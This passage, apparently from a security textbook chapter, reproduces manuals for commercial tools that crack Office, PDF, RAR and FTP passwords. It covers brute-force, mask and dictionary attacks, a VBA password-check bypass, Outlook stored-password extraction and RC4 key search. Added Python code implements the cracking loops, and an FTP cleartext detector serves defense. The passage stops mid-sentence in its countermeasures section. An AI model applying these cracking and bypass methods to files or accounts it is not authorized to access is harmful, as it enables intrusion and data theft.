The password that decrypts the document has not been found yet
Error - an error occurred during the password recovery process. The error message
box is displayed to explain the error.
Figure: 5.2
Any found password can be copied to the clipboard. Simply press the "Copy to
Clipboard" button located to the right of the corresponding password. You can insert the
copied password into any field by pressing the "Ctrl-V" key combination (usually the
Paste menu item is disabled, but the keyboard shortcut always works). A password
which contains international symbols can be displayed incorrectly on Windows® 95, 98
and Me. These Windows® versions don't support Unicode, and therefore we recommend
using Windows® NT, 2000 or XP to recover passwords with international symbols.
The path to the selected file is displayed under the "File Path:" caption. You can open
the file simply by clicking the "Open..." button.
5.5.3 Creating and Saving project
If you need to recover the "open" password for a Word®/Excel® 97/2000/XP,
PowerPoint® XP or Money 2002/2003/2004 document and this password cannot be
recovered instantly, you may create a project. The project file contains all information
about the source file, selected options and character set. You can simply copy the
project file to another computer; you don't need to copy the source file, since the project
contains all the information needed to recover the password.
When you open a file for password recovery and the password cannot be recovered
instantly, the program creates a new project automatically. Project files have an ".OPR"
extension. By default the project name is equal to the source file name. For example, if
you open the "test.doc" file, the project name is "test.opr".
When the file is loaded, you can save your project; all the changes you've made will be
reflected in the project file. The name for the project is selected automatically based on
the name of the file. If you want to give it an alternative name, use the "File | Save Project
As..." menu item. If you don't want to change the name, just use the "File | Save Project"
menu item.
If a project was created and you try to quit AOPR, the Save Project prompt will be
displayed. You can disable this prompt by unchecking the "Prompt if project was
changed" checkbox at the Options tab.
5.5.4 Type of Attack
If a Password cannot be recovered instantly you must use one of the Attack Types. The
following Attack Types are available in AOPR:
5.5.4.1 Brute-Force Attack:
This attack will try all possible character combinations in the specified range. The
range is defined by the Password Length and Brute-Force Range options.
1) Password length
This is one of the most important options affecting checking time. You can check all
4-character (and shorter) passwords in a few minutes. But for longer passwords you have
to have patience and/or some knowledge about the password (including the character
set which has been used, or even better, the mask).
AOPR allows you to set a password length range by defining the minimal and maximal
length. These values can be set using the "Password Length" controls at the
"Brute-Force" tab. The minimal length cannot be set to a value greater than the maximal
one; in this case an appropriate error message will be displayed.
If the minimal and maximal lengths are not the same, the program tries the shorter
passwords first. For example, if you set Minimal=3 and Maximal=7, the program will
start from 3-character passwords, then try 4-character ones and so on, up to 7. While
AOPR is running, it shows the current password length, as well as the current
password, average speed, elapsed and remaining time, and total and processed
number of passwords (some of these parameters are displayed in the "Extended
Statistics" dialog). All of this information except average speed and elapsed time, which
are global, relates only to the current length.
Figure: 5.3
2) Brute-force range options
In MS Office documents passwords may contain the following Characters: latin letters
(both small and capital), digits, special symbols (like @, #, $ etc) and national languages
symbols. You can select these Ranges separately, or define your own Password Range.
To define your own range, check the box "Custom charset" and press the "Custom
charset…" button.
The Predefined Passwords Ranges contain the following Characters:
"a - z": abcdefghijklmnopqrstuvwxyz
"A - Z": ABCDEFGHIJKLMNOPQRSTUVWXYZ
"0 - 9": 0123456789
"!@..." (special characters): !@#$%^&*()_+-=<>,./?[]{}~:;`'|"\
"All Printable": contains all Ranges defined above
3) Password mask
If you already know some characters in the Password, you can specify the Mask to
decrease the total number of passwords to be verified. At the moment, you can set the
Mask only for fixed-length Passwords, but doing this can still help.
For example, you know that the Password contains 8 characters, starts with 'x', and
ends with '99'; the other symbols are small or capital letters. So, the Mask to be set is
"x?????99", and the charset has to be set to All caps and All small. With such options,
the total number of the passwords that AOPR will try will be the same as if you're
working with 5-character passwords which don't contain digits; it is much less than if the
length were set to 8 and the All Printable option were selected. In the above example,
the '?' chars indicate the unknown symbols.
If you know that the Password contains an occurrence of the Mask character '?', you
can choose a different Mask Character to avoid having one character, '?', represent both
an unknown pattern position and a known character. In this case, you could change the
Mask Symbol from '?' to, for example, '#' or '*', and use a mask pattern of "x######?"
(for mask symbol '#') or "x******?" (for mask symbol '*').
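As an added example, not code from AOPR or from this course, the Python below computes the search-space sizes the mask discussion relies on and enumerates candidates from a mask with a configurable mask symbol, trying shorter lengths first as described under Password length. The predefined ranges are the ones listed above; the check() callback is an assumption standing in for the verification step (the actual Office key derivation is not modelled). The same arithmetic applies unchanged to the APDFPR mask option in section 5.9.1.3.

```python
import itertools

# The predefined ranges from the text; "All Printable" is their union (94 characters).
LOWER = "abcdefghijklmnopqrstuvwxyz"
UPPER = LOWER.upper()
DIGITS = "0123456789"
SPECIAL = "!@#$%^&*()_+-=<>,./?[]{}~:;`'|\"\\"
ALL_PRINTABLE = LOWER + UPPER + DIGITS + SPECIAL

def keyspace(charset, min_len, max_len):
    """Number of candidates for an unmasked brute-force run over a length range."""
    n = len(set(charset))
    return sum(n ** length for length in range(min_len, max_len + 1))

def mask_keyspace(mask, charset, mask_symbol="?"):
    """Number of candidates for a fixed-length mask: only the unknown positions vary."""
    return len(set(charset)) ** mask.count(mask_symbol)

def expand_mask(mask, charset, mask_symbol="?"):
    """Yield every candidate matching the mask, unknown positions filled from charset.
    Any other character in the mask (including a literal '?' when the mask symbol
    has been changed to '#' or '*') is kept as a known character."""
    charset = "".join(dict.fromkeys(charset))  # drop duplicates, keep order
    unknown = [i for i, c in enumerate(mask) if c == mask_symbol]
    template = list(mask)
    for fill in itertools.product(charset, repeat=len(unknown)):
        for pos, ch in zip(unknown, fill):
            template[pos] = ch
        yield "".join(template)

def brute_force(check, charset, min_len, max_len):
    """Shorter lengths first, as described; stops at the first candidate check() accepts.
    check() is the assumed verification callback for the example."""
    charset = "".join(dict.fromkeys(charset))
    for length in range(min_len, max_len + 1):
        for cand in itertools.product(charset, repeat=length):
            s = "".join(cand)
            if check(s):
                return s
    return None
```

For the "x?????99" example the mask leaves five unknown letters over 52 characters, 52^5 candidates, the same count as a plain 5-character letters-only run and far below the 94^8 of an 8-character All Printable search.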
You can define your own Character Set for the Brute-Force Attack. Click the "Define
Custom Charset" button at the "Brute-Force" tab. The following Dialog will appear:
4) Custom Charset
You can enter the custom charset either in text or in HEX format. In HEX format the
Unicode symbols must be separated by spaces.
You can Load, Save, Clear and Add charsets by pressing the corresponding buttons.
After you enter the charset, AOPR checks for duplicate characters and removes them
automatically.
The following charsets are included in the AOPR distribution:
Arabic (all Arabic symbols according to Unicode standard)
Armenian
Czech (split to caps and small letters)
French (split to caps and small letters)
German (split to caps and small letters)
Greek (all symbols according to Unicode standard)
Greek (letters only)
Hebrew
Japanese (Katakana)
Japanese (Hiragana)
Korean (Hangul Jamo)
Russian (Cyrillic)
If the "Additional charsets" option was selected in installation, these charsets are placed
in the "\charsets" directory.
5) Dictionary Attack:
This attack verifies the words stored in the specified dictionary file. The dictionary is
just a text (ASCII) file with one word per line; the lines are separated by line breaks.
You can set additional Dictionary Options for this attack. A dictionary attack is much
faster than brute force, so we recommend running it first. AOPR is supplied with one
small dictionary file containing English words. Additional dictionaries can be obtained
on a CD with any Elcomsoft program.
To select the needed Attack Type click the corresponding radio button under "Type of
Attack for Documents with Strong Encryption".
Dictionary Options
At first you have to select the desired Dictionary File. Click the "Select Dictionary File..."
button at the "Dictionary" tab and select the needed file.
In this attack the program will try all words from the file as passwords for the selected
document. It really helps when the password has some meaning, i.e. is a whole word.
You can select the option "Smart mutations" or "Try all possible upper/lower case
combinations"; either may really help if you're not sure about the case the password has
been typed in. For example, let's assume that the next word in the dictionary is
«PASSword» (the case, actually, doesn't matter here). With the second option enabled,
the program will just try all possible combinations, like:
password
passworD
passwoRd
passwoRD
passwOrd
…
PASSWORd
PASSWORD
However, checking all such combinations takes a lot of time: in the example above, the
program will check 2^8 words (i.e. 256) instead of one. With Smart Mutations, you can
eliminate a number of "virtually impossible" combinations, and here are all the words
which will be checked:
1. PASSword (as is)
2. passWORD (reversed)
3. password (all lower case)
4. PASSWORD (all upper case)
5. Password (first uppercase, rest lowercase)
6. pASSWORD (first lower case, rest uppercase)
7. PaSSWoRD (elite: vowels in lc, others in uc)
8. pAsswOrd (noelite)
9. PaSsWoRd (alt/1)
10. pAsSwOrD (alt/2)
So, it makes only 10 combinations for each word.
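The ten Smart Mutations rules and the all-combinations option, as an added example in Python (not ElcomSoft's code): the rule set is reconstructed from the list above, so the exact order and the dropping of rules that coincide for a given word are this example's assumptions, and the check() callback stands in for the document's password verification. The same two options are offered by APDFPR in section 5.9.1.5.

```python
from itertools import product

VOWELS = set("aeiou")

def all_case_combinations(word):
    """'Try all possible upper/lower case combinations': 2^n candidates for n letters,
    generated with the first letter varying slowest."""
    choices = [(c.lower(), c.upper()) if c.isalpha() else (c,) for c in word]
    for combo in product(*choices):
        yield "".join(combo)

def smart_mutations(word):
    """The ten 'Smart mutations' rules in the order the text lists them, with
    duplicates dropped (for a word like 'hello', 'as is' and 'all lower case' coincide)."""
    lo, up = word.lower(), word.upper()
    rules = [
        word,                                                        # 1. as is
        word.swapcase(),                                             # 2. reversed
        lo,                                                          # 3. all lower
        up,                                                          # 4. all upper
        lo.capitalize(),                                             # 5. First upper
        lo[:1] + up[1:],                                             # 6. fIRST LOWER
        "".join(c if c in VOWELS else c.upper() for c in lo),        # 7. elite
        "".join(c.upper() if c in VOWELS else c for c in lo),        # 8. noelite
        "".join(c.upper() if i % 2 == 0 else c for i, c in enumerate(lo)),  # 9. alt/1
        "".join(c if i % 2 == 0 else c.upper() for i, c in enumerate(lo)),  # 10. alt/2
    ]
    out = []
    for r in rules:
        if r not in out:
            out.append(r)
    return out

def dictionary_attack(check, words, mode="smart"):
    """Try each wordlist entry under the chosen mutation mode ("smart" or "all");
    returns (password or None, number of candidates tried)."""
    tried = 0
    for w in words:
        gen = smart_mutations(w) if mode == "smart" else all_case_combinations(w)
        for cand in gen:
            tried += 1
            if check(cand):
                return cand, tried
    return None, tried
```

For «PASSword» the all-combinations mode produces 256 candidates against at most ten for Smart Mutations, which is the trade-off the text describes: the smart list misses odd capitalisations, the full list costs 2^n work per word.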
6) Auto-Save
If you'd like AOPR to save its state periodically, check the "Enable Auto-Save"
option at the "Options" tab, and select the time (in minutes) between saves in the
"Intervals" control. If you do that, AOPR will periodically update the project file, exactly
as if you selected the "Save project" menu item yourself. Even if your computer stops
responding (or if power fails), you'll be able to resume breaking the password from the
last saved state. Enabling this option is strongly recommended.
7) AOPR Options
AOPR options can be adjusted at the "Options" tab.
Priority options: Idle or High. If you want to run AOPR as a "background" process,
which will work only when the CPU is in an idle state, select "Idle". If you want to
increase performance, select "High", but be aware that this will decrease the
performance of *all other* applications running on your computer.
The "Enable Program Log" option instructs the program to write all messages (the same as
in the Log Window) to the "aoxppr.log" file, for future analysis.
The "Enable Debug log" option creates a separate log file ("aoxppr_debug_log.txt") with
detailed information about Outlook® mail account recovery.
Folder for log files: select the folder where the "aoxppr.log" and "aoxppr_debug_log.txt"
files will be created.
Clear files history is not an option, actually, but just a button; press it to clear the list of
files you recently opened for password recovery. This button is located at the "Recovery" tab.
If you select the Minimize to tray option, the program will hide itself from the screen
when minimized (so you will not see a button for it on the Windows® taskbar), but a
small icon will be created in the tray (the notification area). Double-click on it to restore.
By disabling the Prompt if project was changed option, you instruct AOPR not to display
messages like "The project has been changed. Save?" when you've changed some
options and open another project, or create a new one.
The progress bar update interval ("Progress, ms") option allows you to set how often the
program will update the progress bar and display the password which is currently being
verified. A higher value will give you slightly better speed; the recommended one is 500
(milliseconds). If the interval is set to 0, the progress bar will not be updated at all (but
you will still be able to stop the process, of course, and resume from that point later).
5.6 Recovering E-Mail account passwords___________
Passwords to Microsoft® Outlook® E-Mail Accounts which were stored locally can be
easily recovered by clicking the "MS Outlook®" button or selecting the "Internet |
Outlook® Mail Accounts..." menu item.
Figure: 5.4
If MS Outlook® has any e-mail accounts configured, the dialog shown above will be
displayed.
The following information is given: Server Address, Login, Password, Server Type
(POP3, IMAP or HTTP) and the auxiliary string PST (Password Storage Type).
Outlook® Password Storage Types
Typically, Microsoft® Outlook® stores all passwords in the Protected Storage
subsystem. All passwords are stored in the system Registry in encrypted form. However,
some old versions can store account passwords in plain (unencrypted) form, or
encrypted with a weak algorithm (a logical XOR operation). In some cases, AOPR can show
wrong passwords, for example if your system Registry is damaged, or you do not have
enough rights (permissions) to access some keys in the Registry, or the Protected Storage
subsystem is not installed on your computer. Displaying the Password Storage Types will
help you identify why some passwords are displayed incorrectly. Here is a brief
description of the Password Storage Types:
PS - Password is successfully retrieved and stored in Protected Storage.
O3 - Password is stored in System Registry by Outlook® 2003
OL - Password is successfully retrieved and stored in system Registry using "old-style"
weak encryption algorithm.
NP - Password was not found in Protected Storage, in some cases it indicates that user
name is used as password, or Protected Storage subsystem is damaged.
UN - Unknown Password Storage Type. You may use version of Outlook® that is not
supported by AOPR, or your system Registry is damaged.
ER - Error in password retrieving.
NR - Password was not retrieved. You do not have enough rights to unlock the
Protected Storage, or Protected Storage is not installed on your machine.
NO - Password for this account is absent.
5.7 IE Content Advisor Password__________________
Internet Explorer Content Advisor Password can be simply changed or deleted by
clicking the "Internet CA" button.
The following dialog will be displayed:
Figure: 5.5
Check the "Save old Password" checkbox to save the old password record. You can
restore the old password by clicking the "Restore saved Password" button. A system
reboot may be required to complete the Content Advisor password change.
5.8 VBA Backdoor_______________________________
If you have a document with a password-protected VBA project, but for some reason the
password cannot be recovered, or the password shown by AOPR cannot be entered (for
example it contains non-English characters that cannot be entered using your
keyboard), or AOPR only allows you to change or remove that password (but you would not
like to do that), you can use the "VBA backdoor" feature. It works for all applications
which can create VBA projects in their documents, not only Microsoft® Office (for
example, Corel WordPerfect Office and AutoCAD).
With this feature, the password is not recovered at all. However, you are able to
open the VBA project (to view/edit the code). Of course, you must have the application
this document was created with (or a later version) installed.
Just press the "VBA Backdoor" button on AOPR toolbar (or select VBA Backdoor | Open
file through backdoor menu item). The program will prompt you for the document file.
Select the file and the following dialog will be displayed:
Figure: 5.6
Here you can set additional command line parameters if needed. AOPR will run the
application this document was created with (in a special way) and load your
document into it. Now go into the VBA properties (typically under "Tools | Macro |
Visual Basic Editor" or "Tools | VBAProject Properties"). You'll be prompted for the
password. Enter ANY one (e.g., xyz), and it will be accepted!
If your document was created in Microsoft® Office 97, you can use Office 2000 or
Office XP, too. However, the reverse is not true: if you would like to unprotect an Office
2000/XP document but have only Office 97 installed, AOPR will still run it (with a
warning message), but the backdoor will not work.
In addition (for example, if the extension of the protected file is not registered in the
system, so AOPR doesn't know what program to execute), you can just run the desired
application (one with VBA support: Word®, Excel®, FrontPage, AutoCAD etc.) using the
same technology: select the "VBA Backdoor | Launch application" menu item. The
backdoor will be activated, and for all documents you open in that application, any
password will be accepted.
Please note that this backdoor is supported only for a limited number of versions of the
VBA engine (VBE.DLL or VBE6.DLL): the ones that were available when the current
version of AOPR was released (the latest one comes with Microsoft® Office 2003). When
the application is executed, AOPR prints (in the Log Window) the size and version
number of that DLL. If yours is not supported yet, AOPR uses a "generic" patch, which
may fail under certain circumstances. In other words, the VBA project password is
enforced only by the VBA engine running inside the application, so patching that check
in the running process bypasses it entirely; a VBA project password is an anti-tampering
convenience, not a confidentiality control for the code.
5.9 Advanced PDF Password Recovery (APDFPR)____
Advanced PDF Password Recovery (APDFPR) is a program to decrypt protected Adobe
Acrobat PDF files, which have "user" and/or "owner" passwords set, preventing the file
from opening or editing, printing, selecting text and graphics etc.
With the Standard edition of the program, if only the "owner" password is set, password
recovery is not needed at all: the file is decrypted instantly (so all restrictions are
removed). The Professional edition can also recover the "user" password using brute-force
and dictionary attacks, or instantly from the "owner" password; it also supports
the "key search" attack to decrypt PDF files with 40-bit encryption regardless of the
password length, guaranteed. In addition, it is able to clean PDF files of JScript code,
form fields and digital signatures. The Enterprise edition also includes an improved version
of the "key search" attack: it is shipped with a DVD that contains special Thunder Tables(TM)
that allow decrypting all 40-bit PDF files in just minutes instead of days.
The program that is licensed to you is absolutely legal and you can use it provided that
you are the legal owner of all files or data you are going to recover through the use of
our software or have permission from the legitimate owner to perform these acts. Any
illegal use of our software will be solely your responsibility. Accordingly, you affirm that
you have the legal right to access all data, information and files that have been hidden.
You further attest that the recovered data, passwords and/or files will not be used for
any illegal purpose. Be aware that password recovery and the subsequent data
decryption of unauthorized or otherwise illegally obtained files may constitute theft or
another wrongful action and may result in your civil and (or) criminal prosecution.
Figure: 5.7
Encrypted PDF file
Just enter the name of the PDF document you'd like to get the password for. Use the
Open button on program toolbar, [File] | [Open File] menu item or F3 key to pick the file
from the list. Alternatively, you can use drag' n 'drop – just drag the file (with a mouse)
from Windows Explorer, and drop it to the APDFPR window.
If the Start attack on file select option is enabled, the program analyses the encryption used.
If only the "owner" password is set, or any of the passwords ("user" or "owner") is known,
and you just need to remove restrictions from the file, you can decrypt the file
immediately. If the "user" password is set but not known, you have to select other
options and start the attack; consult the next chapters for more information.
If the file is encrypted using any security method other than standard, APDFPR will
display an error message (that this kind of encryption is not supported), and write a
corresponding record to the log file. If the file is corrupted, or could not be opened for
some other reason, an appropriate error message will be shown. For more information,
please refer to the Error messages chapter.
If the file is not encrypted at all, but contains JScript code, form fields or digital
signatures, the program offers to remove any of these elements:
Figure: 5.8
Please note that if the file is password protected or restricted and contains such
elements, it must be processed in two steps: decrypt it first, then load the file into
APDFPR again to remove the digital signatures and/or other elements.
5.9.1 Type of Attacks
5.9.1.1 Brute-force Attack
Brute-force range options
Instructs the program what characters have been used in the password. You can
choose from all capital letters, all small letters, all digits, all special symbols and the
space, or all printable (includes all of the above). The special characters are:
!@#$%^&*()_+-=<>,./?[]{}~:;`'|"\
Alternatively, you can define your own character set (charset). Just mark the
"User-defined" checkbox and click on "Custom charset…" (at the right of the option). In the
input window, enter all chars of your password range; for example, if you remember that
your password was entered in the bottom keyboard row ("zxcvbnm,./"), your password
range should be "zxcvbnm,./" (or in caps: "ZXCVBNM<>?"). You can also define both of
these: "zxcvbnm,./ZXCVBNM<>?". In addition, you can load and save custom charsets, or
combine them using the "Add charset from file..." button.
Figure: 5.9
5.9.1.2 Start from password
This option may help, for example, if you know the first character(s) of the password.
For example, if you're sure that small letters have been used (from 'a' to 'z'), the
length is 5, and the password definitely starts with 'k', then type 'kaaaa' here. Please
also note that if you press the "Stop" button while APDFPR is working, the program
writes the current password to this field ("Start from password"). It can be used later
to restart the program from the same point.
Please note that the program verifies the passwords according to the following character
order:
CAPITAL letters: 'A'..'Z'
The space
Small letters: 'a'..'z'
Digits: '0'..'9'
Special characters: !@#$%^&*()_+-=<>,./?[]{}~:;`'|"\
You can also use End at field to set the password APDFPR should stop at. It might be
useful if you attack the same document on a few computers, and so can split the whole
password range onto a few parts.
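As an added example (not APDFPR's code), the Python below treats a fixed-length candidate as a number written in the character order listed above, which is what makes "Start from password" and "End at" work: a candidate can be converted to its position in the range, a range can be split into contiguous parts for several machines, and an interrupted run reports the candidate at which to resume. The mapping itself and the check() callback are this example's assumptions.

```python
# Character order APDFPR walks through, as listed in the text: capitals, the space,
# small letters, digits, then the special characters (95 characters in total).
APDFPR_ORDER = ("ABCDEFGHIJKLMNOPQRSTUVWXYZ" + " " + "abcdefghijklmnopqrstuvwxyz"
                + "0123456789" + "!@#$%^&*()_+-=<>,./?[]{}~:;`'|\"\\")

def password_to_index(password, charset):
    """Ordinal of a fixed-length candidate in charset^len (first character most significant)."""
    idx = 0
    for c in password:
        idx = idx * len(charset) + charset.index(c)
    return idx

def index_to_password(idx, length, charset):
    """Inverse of password_to_index for the given length."""
    chars = []
    for _ in range(length):
        idx, r = divmod(idx, len(charset))
        chars.append(charset[r])
    return "".join(reversed(chars))

def split_range(start, end, parts, charset):
    """Divide the candidates from start to end (inclusive) into contiguous
    (Start-from, End-at) pairs, one per machine."""
    lo, hi = password_to_index(start, charset), password_to_index(end, charset)
    total = hi - lo + 1
    n = len(start)
    return [(index_to_password(lo + total * i // parts, n, charset),
             index_to_password(lo + total * (i + 1) // parts - 1, n, charset))
            for i in range(parts)]

def search(check, start, end, charset, budget=None):
    """Try candidates from start to end in order. If the budget runs out (the user
    pressed Stop), return (None, current_password) so the next run can resume there.
    check() is the assumed verification callback for the example."""
    lo, hi = password_to_index(start, charset), password_to_index(end, charset)
    n = len(start)
    for tried, i in enumerate(range(lo, hi + 1)):
        cand = index_to_password(i, n, charset)
        if budget is not None and tried >= budget:
            return None, cand
        if check(cand):
            return cand, None
    return None, None
```

With the lowercase range, 'kaaaa' from the text sits at position 10 x 26^4, so starting there skips the 38% of the 5-character space that begins with 'a' to 'j'; splitting 'aaa'..'zzz' in two hands 'aaa'..'mzz' to one machine and 'naa'..'zzz' to the other.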
5.9.1.3 Password mask
If you already know some characters in the password, you can specify the mask to
decrease the total number of passwords to be verified. At the moment, you can set the
mask only for fixed-length passwords, but doing this can still help.
For example, you know that the password contains 8 characters, starts with 'x', and
ends with '99'; the other symbols are small or capital letters. So, the mask to be set is
"x?????99", and the charset has to be set to All caps and All small. With such options,
the total number of the passwords that APDFPR will try will be the same as if you're
working with 5-character passwords which don't contain digits; it is much less than if the
length were set to 8 and the All Printable option were selected. In the above example,
the '?' chars indicate the unknown symbols.
If you know that the password contains an occurrence of the mask character '?', you can
choose a different mask character to avoid having one character, '?', represent both an
unknown pattern position and a known character. In this case, you could change the
mask symbol from '?' to, for example, '#' or '*', and use a mask pattern of "x######?"
(for mask symbol '#') or "x******?" (for mask symbol '*'). Select the mask symbol on
Advanced Options page.
5.9.1.4 Password length
This is one of the most important options affecting checking time. Usually, you can test
all short passwords in just a few minutes; but for longer passwords, you have to have
patience and/or some knowledge about the password (including the character set which
has been used, or even better – the mask).
The minimum length cannot be set to a value greater than maximum length, of course.
Figure: 5.10
If the minimum and maximum lengths are not the same, the program tries the shorter
passwords first. For example, if you set minimum=3 and maximum=7, the program will
start from 3-character passwords, then try 4-character ones and so on – up to 7. While
APDFPR is running, it shows the current password length, as well as the current
password, average speed, elapsed and remaining time, and total and processed
number of passwords (Program status). All of this information except average speed
and elapsed time, which are global, is related only to the current length.
5.9.1.5 Dictionary options
Simply select the desired wordlist file. In addition, you can enable the Smart mutation
option or Try all possible upper/lower case combinations; this really helps if you are
not sure about the case the password was typed in. For example, assume that the next
word in the wordlist is "PASSword" (the case actually doesn't matter here). With the
second option enabled, the program will simply try all possible case combinations, as
Advanced Office Password Recovery does.
5.9.1.6 Key search
If the PDF file has both user and owner passwords and they are long and complex, you
have nothing to do but try this attack. It tries all possible RC4 encryption keys until it
finds the right one, and then decrypts the file using that key; the resulting PDF file
will have no security at all. This method gives 100% success.
In PDF 1.2/1.3 files (Acrobat 4.x or older), the key length is 40 bits, so the total
number of keys is 2^40, or 1,099,511,627,776. The whole key space is divided into 65,536
blocks of 16,777,216 keys each; the whole recovery process takes about 30 days on an
old and slow PIII-450 computer, and just 3-5 days on modern Intel Core 2 Duo
processors.
You have to select the block to start from (Start from block input box) and the ending block
(End at block box); both values can be from 0 to 65536. During the attack, the
program shows the number of the current block, time elapsed, average speed (in keys
per second), the number of keys already processed and the total number of keys.
When the key is found, the program shows it and asks you to decrypt the file; if you
already know the key, just enter it into the Document key input box and press the Decrypt
button at the right.
With the Enterprise version of APDFPR, you can seriously speed up this attack by
enabling the Use pre-computed hash tables option; press the Select user hashes directory
button at the right and browse for the folder where the tables are located. This folder
should contain the following folders/files (Thunder Tables):
0\t00_l17000.data
0\t00_l17000.index
1\t01_l17000.data
1\t01_l17000.index
2\t02_l17000.data
2\t02_l17000.index
3\t03_l17000.data
3\t03_l17000.index
4\t04_l17000.data
4\t04_l17000.index
5\t05_l17000.data
5\t05_l17000.index
missing.bin
It is NOT recommended to use the tables directly from the DVD (shipped with the Enterprise
version) because of very slow DVD drive performance. You can copy the DVD contents
to the hard drive, or even better, to a USB flash drive. USB flash drives have relatively low
performance when reading files, but a much better random seek time than a hard drive,
and seek time is the parameter that matters most for this attack.
With hash tables on a hard drive, this attack takes from 10 to 30 minutes to complete; on
a USB flash drive it takes from just a few seconds up to 10-15 minutes (worst case). This
option also provides guaranteed recovery.
Finally, please note that Adobe Acrobat 5.0 and later (including the latest version, 8.0)
can create PDF files with an improved security level: 56..128-bit RC4 encryption (PDF 1.4
specification; see the New feature highlights document on the Adobe server), so this
attack is not applicable to them (you will get an error message).
5.9.1.7 Auto-save
If you'd like APDFPR to save its state periodically, check the appropriate option
and select the time (in minutes) between saves. APDFPR will then create and
periodically update a restore file named "~apdfpr.axr" (that's the default; you can
change it) in the same folder where your document is located (also by default; you can
select any other folder to save that file to). This file is similar to the one created when using
the "Save setup" button. Even if your computer stops responding (or if power fails), you'll
be able to resume the password search from the last saved state. Instead of using the
default settings (the name of the file and the folder it will be saved to), you can also
select your own. Enabling this option is strongly recommended.
5.10 RAR Password Recovery_____________________
RAR Password Recovery is a powerful tool to recover lost (forgotten) passwords for
RAR/WinRAR (2.xx and 3.xx) archives. The program supports the "brute-force" attack,
the dictionary-based attack and the dramatically faster "Booost-Up" attack. The program is
able to resume a previously interrupted attack.
Figure: 5.11
Here is a brief list of RAR Password Recovery advantages:
1. Recovers passwords for RAR/WinRAR archives of versions 2.xx and 3.xx using a
combination of Brute-Force, Booost-Up or Dictionary attacks.
2. Very high speed of work (more than 3000 passwords per second in Brute-Force
mode and up to 22000 passwords per second in Booost-Up mode).
3. Customizability.
4. Advanced heuristic processor.
5. User-friendly interface.
6. Large wordlist dictionary.
7. Ability to work in the background.
8. Autosave feature.
5.11 FTP Password Recovery_____________________
Advanced FTP Password Recovery is a program that will catch, sniff and show your
forgotten FTP passwords. This FTP password finder is very easy to use and can
recover passwords from all FTP clients including CuteFTP, WS_FTP, FileZilla,
SmartFTP, FlashFXP and Bulletproof FTP.
Advanced FTP Password Recovery can intercept and find FTP passwords from
the following FTP clients:
Figure: 5.12
CuteFTP password decrypter
WS FTP password recovery
FileZilla FTP password cracker
SmartFTP password
FlashFXP password
Bulletproof FTP password interceptor
LeechFTP password
FTP Explorer password decoder
Core FTP password sniffer
AceFTP password
FTP Voyager password ripper
FTP Commander account hacker
CoffeeCup FTP password finder
Website Publisher password
SecureFX password
FTPRush password
FTP Navigator password
FTP Express password and many many others...
Extra recovery features:
All versions of FTP clients are supported
Support for multiple FTP accounts
Works through any Firewall
Opens alternative port if port 21 is used by another program
Recovery guaranteed!
How this FTP password Recovery works:
The FTP protocol was developed a long time ago, when security was not as big an
issue as it is now. Hence, data transfer in the FTP protocol is unencrypted. Text
information, including FTP passwords, is sent in plain-text format, and anyone who
intercepts the connection (e.g. by sniffing the local area network) is able to see these
passwords.
This program works by emulating an FTP server and recording the passwords it
receives.
This means that once you run FTP Password Recovery, you will see the passwords of
anyone who connects to your computer on port 21 with an FTP client.
All you need to do is start FTP Password Recovery and connect to it with your FTP
client.
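The weakness just described, that USER and PASS travel in clear text, is something a defender can check for in captured control-channel traffic. The following is an added example, not part of the manual or of Advanced FTP Password Recovery: it scans a constructed FTP control-channel capture for cleartext logins and reports each one with the user name, the outcome and the password length only, never the password itself. The capture text, the "C:"/"S:" direction prefixes and the function names are assumptions.

```python
import re
from dataclasses import dataclass
from typing import List, Optional

# Constructed FTP control-channel capture, not a real session. Lines sent by
# the client are prefixed "C:", server replies "S:" (a labelling assumption).
SAMPLE_CAPTURE = """\
S: 220 ftp.example.test FTP server ready
C: USER alice
S: 331 Password required for alice
C: PASS hunter2
S: 230 User alice logged in
C: USER bob
S: 331 Password required for bob
C: PASS wrongpass
S: 530 Login incorrect
C: QUIT
S: 221 Goodbye
"""

USER_RE = re.compile(r"^C:\s*USER\s+(\S+)", re.IGNORECASE)
PASS_RE = re.compile(r"^C:\s*PASS\s+(\S*)", re.IGNORECASE)
REPLY_RE = re.compile(r"^S:\s*(\d{3})")


@dataclass
class ClearTextLogin:
    user: Optional[str]        # None if PASS was seen without a prior USER
    password_length: int       # length only; the secret itself is never kept
    accepted: Optional[bool]   # True on a 2xx reply, False on 4xx/5xx, None if unknown
    line_no: int               # line of the PASS command within the capture


def find_cleartext_logins(capture: str) -> List[ClearTextLogin]:
    """Find every password sent in clear over the FTP control channel."""
    findings: List[ClearTextLogin] = []
    current_user: Optional[str] = None
    awaiting_reply: Optional[ClearTextLogin] = None
    for line_no, line in enumerate(capture.splitlines(), start=1):
        m = USER_RE.match(line)
        if m:
            current_user = m.group(1)
            continue
        m = PASS_RE.match(line)
        if m:
            awaiting_reply = ClearTextLogin(current_user, len(m.group(1)), None, line_no)
            findings.append(awaiting_reply)
            continue
        m = REPLY_RE.match(line)
        if m and awaiting_reply is not None:
            code = m.group(1)
            if code[0] == "2":
                awaiting_reply.accepted = True
                awaiting_reply = None
            elif code[0] in "45":
                awaiting_reply.accepted = False
                awaiting_reply = None
            # a 3xx reply (e.g. 332 need account) leaves the outcome undecided
    return findings


def report(findings: List[ClearTextLogin]) -> List[str]:
    """Alert lines for a log or ticket; they contain no password material."""
    lines = []
    for f in findings:
        outcome = {True: "accepted", False: "rejected", None: "outcome unknown"}[f.accepted]
        lines.append(f"line {f.line_no}: cleartext password ({f.password_length} chars) "
                     f"for user {f.user or '<unknown>'}, {outcome}")
    return lines


if __name__ == "__main__":
    for line in report(find_cleartext_logins(SAMPLE_CAPTURE)):
        print(line)
```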
How to use Advanced FTP Password Recovery:
1. Download FTP Password Recovery
2. Run the downloaded file and install FTP Password Recovery
3. Make sure you select the Run Advanced FTP Password Recovery checkbox at the
end of your setup
4. Open your FTP client
5. Open the connection properties (e.g. account manager)
6. Remember the current FTP server address
7. We advise you to write it down
8. Change the FTP server address to localhost
9. Change the port to 21 (or 22, as indicated in the Advanced FTP Password Recovery
window)
10. Repeat this for all necessary servers
11. Confirm the changes
12. Try to connect to each server
13. You will see the captured passwords in the Advanced FTP Password Recovery window
14. Change the server addresses in your FTP client back to the originals
5.12 Countermeasures___________________________
The best defense against weak file password protection is to require your users to use a
stronger form of file protection, such as PGP, when necessary.
Ideally, you don’t want to rely on users to make decisions about what they should use
this method to secure, but it’s better than nothing. Stress that a file-encryption
mechanism such as PGP is secure only if users keep their passwords confidential and
never transmit or store them in clear text.
If you’re concerned about non-secure transmissions through e-mail, consider one of
these options:
